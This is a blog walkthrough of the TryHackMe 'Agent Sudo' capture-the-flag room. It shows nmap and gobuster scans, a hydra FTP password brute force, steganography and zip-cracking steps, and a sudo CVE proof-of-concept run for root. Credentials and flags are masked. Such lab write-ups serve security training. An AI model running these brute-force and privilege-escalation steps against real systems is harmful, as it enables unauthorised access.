TryHackMe — Agent Sudo

Having fun with TryHackMe again. So, here is the write up and guideline to pass this Agent Sudo challenge.

Room: https://www.tryhackme.com/room/agentsudoctf
Level: Easy

Task: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

As usual, open the IP in browser first.

No hint here even in the source code. Hmm.. Check nmap which and how many ports is opened. Check all port range…

# nmap -A -T4 -sV -p- 10.10.X.X
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement

3 port is opened. Now run gobuster, see if any hidden path

# gobuster dir -u http://10.10.X.X -w ~/wordlists/dirb/big.txt -t 50

Nay~~ Check with multiple dict no result for hidden path. Might be a long name or unique name. Its okay, now we nikto it

# nikto -h 10.10.X.X

Nay also~~ Using okadminfinder3, just incase,

# ./okadminfinder.py -u 10.10.X.X
...
0 Admin pages found
...

So, enough brute. From the hint, says that the page is only redirect if you have the correct user agent. Switch between chrome, firefox, safari, bot, none working. Must be custom user agent. There is 2 agent — Agent C and Agent R.

Uncheck and choose custom user agent. Put “R” only as user agent

Okay, it changed. Now try change to “C” user agent

Now found the name of the agent C. From the notes, the password is weak. Hail hydra then,

# hydra -l XXXXX -P ~/wordlists/rockyou.txt 10.10.X.X ftp
...
[21][ftp] host: 10.10.X.X login: XXXXX password: XXXXXXX
1 of 1 target successfully completed, 1 valid password found

Lets access the FTP then,

Dear agent J,

All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn’t be a problem for you.

From,
Agent C

I think stega images here. So lets try decode it,

# steghide extract -sf cute-alien.jpg
steghide: could not extract any data with that passphrase
# steghide extract -sf cutie.png
steghide: the file format of the file "cutie.png" is not supported

“cutie.png” — file format is not supported means its not an image

# binwalk 
binwalk cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22

It’s a zip file. Lets unzip

# unzip cutie.png
Archive: cutie.png
warning [cutie.png]: 34562 extra bytes at beginning or within zipfile
(attempting to process anyway)
skipping: To_agentR.txt need PK compat. v5.1 (can do v4.5)

Unable to use unzip. Lets try 7zip

# 7z x cutie.png
Enter password (will not be echoed):

Ok, password needed. Crack it using 7zipcracker then

# ./7zipcrack.sh cutie.png ~/wordlist/rockyou.txt
Password is: XXXXX
# 7z x cutie.png
Enter password (will not be echoed): XXXXX
Everything is Ok
Size: 86
Compressed: 34842
# cat to_agentR.txt
Agent C,
We need to send the picture to 'XXXXXXXX' as soon as possible!
By,
Agent R

It might be a password for another image.

# steghide extract -sf cute-alien.jpg
Enter passphrase: XXXXXXX

Failed!. But the password seem weird for me. Decide to check what type of hash is this

Ok that easy. Base64

# echo "XXXXXXX" | base64 -d
XXXXXX

Got the password!

# steghide extract -sf cute-alien.jpg
Enter passphrase: XXXXXXX
extracted data to "message.txt"

Hi XXXXX,

Glad you find this message. Your login password is XXXXXXXXXXX!

Don’t ask me why the password look cheesy, ask agent R who set this password for you.

Your buddy,
chris

The message already contain username and the password for the SSH

# ssh XXXXX@10.10.X.X# ls -al
...
-rw-r--r-- 1 james james 42189 Jun 19 2019 Alien_autospy.jpg
-rw-r--r-- 1 james james 33 Oct 29 2019 user_flag.txt
...
# cat user_flag.txt
b03d975e8c92a7c041XXXXXXXXXXX

“What is the incident of the photo called?” — There is something with the image. So let’s download the image. There is no stega in it.. so reverse image with google image search and foxnews keyword and found the incident.

Now Privilege escalation. Lets search any basic opener for root.

# sudo su
# cat /etc/crontab
# sudo -l

The hint is there is CVE exploitation. Using linux-soft-exploit-suggester, because of this machine only have python 3, i need to convert the python code to version 3. Lets run it

# python3 linux-soft-exploit-suggester.py
[!]
Bash 5.0 Patch 11 - SUID Priv Drop Exploit - linux
From: bash 4.4.18
File: /usr/share/exploitdb/exploits/linux/local/47726.sh
Url: https://www.exploit-db.com/exploits/47726
[!] Fuse 2.9.3-15 - Local Privilege Escalation - linux
From: fuse 2.9.7
File: /usr/share/exploitdb/exploits/linux/local/37089.txt
Url: https://www.exploit-db.com/exploits/37089
[!] GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage - multiple
From: groff 1.22.3
File: /usr/share/exploitdb/exploits/multiple/local/19430.txt
Url: https://www.exploit-db.com/exploits/19430
[!] Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH - linux
From: libc 2.27
File: /usr/share/exploitdb/exploits/linux/local/19302.c
Url: https://www.exploit-db.com/exploits/19302
[!] Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow - linux
From: libc 2.27
File: /usr/share/exploitdb/exploits/linux/local/19360.c
Url: https://www.exploit-db.com/exploits/19360
[!] UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS (1) - multiple
From: libc 2.27
File: /usr/share/exploitdb/exploits/multiple/local/19551.c
Url: https://www.exploit-db.com/exploits/19551
[!] MAWK 1.3.3-17 - Local Buffer Overflow - linux
From: mawk 1.3.3
File: /usr/share/exploitdb/exploits/linux/local/42357.py
Url: https://www.exploit-db.com/exploits/42357
[!] OpenSSH 2.3 < 7.7 - Username Enumeration (PoC) - linux
From: openssh 7.6
File: /usr/share/exploitdb/exploits/linux/remote/45210.py
Url: https://www.exploit-db.com/exploits/45210
[!] OpenSSH 2.3 < 7.7 - Username Enumeration - linux
From: openssh 7.6
File: /usr/share/exploitdb/exploits/linux/remote/45233.py
Url: https://www.exploit-db.com/exploits/45233
[!] OpenSSH < 7.7 - User Enumeration (2) - linux
From: openssh 7.6
File: /usr/share/exploitdb/exploits/linux/remote/45939.py
Url: https://www.exploit-db.com/exploits/45939
[!] sudo 1.8.27 - Security Bypass - linux
From: sudo 1.8.21
File: /usr/share/exploitdb/exploits/linux/local/47502.py
Url: https://www.exploit-db.com/exploits/47502
[!] Sudo 1.8.25p - 'pwfeedback' Buffer Overflow - linux
From: sudo 1.8.21
File: /usr/share/exploitdb/exploits/linux/local/48052.sh
Url: https://www.exploit-db.com/exploits/48052
[!] Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1) - multiple
From: sudo 1.8.21
File: /usr/share/exploitdb/exploits/multiple/local/49521.py
Url: https://www.exploit-db.com/exploits/49521
[!] Vim < 8.1.1365 / Neovim < 0.3.6 - Arbitrary Code Execution - linux
From: vim 8.0.1453
File: /usr/share/exploitdb/exploits/linux/local/46973.md
Url: https://www.exploit-db.com/exploits/46973

I tried any CVE that cause privilege escalation and found 1 (CVE-XXXX–XXXXX). Here the step, download the CVE POC script and run it

# bash cve.sh
[sudo] password for james:
[-] This user has sudo rights
[-] Checking sudo version
[-] This sudo version is vulnerable
[-] Trying to exploit
# id
uid=0(root) gid=1000(james) groups=1000(james)
# sudo su
# root@agent-sudo:/home/james#

Now the root is available to be access! Now you own everything. Find the root flag

To Mr.hacker,Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.Your flag isb53a02f55b57d4439e3341XXXXXXXXXBy,
DesKel a.k.a Agent R

Completed!!!

Software Engineer at Teratotech.com

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store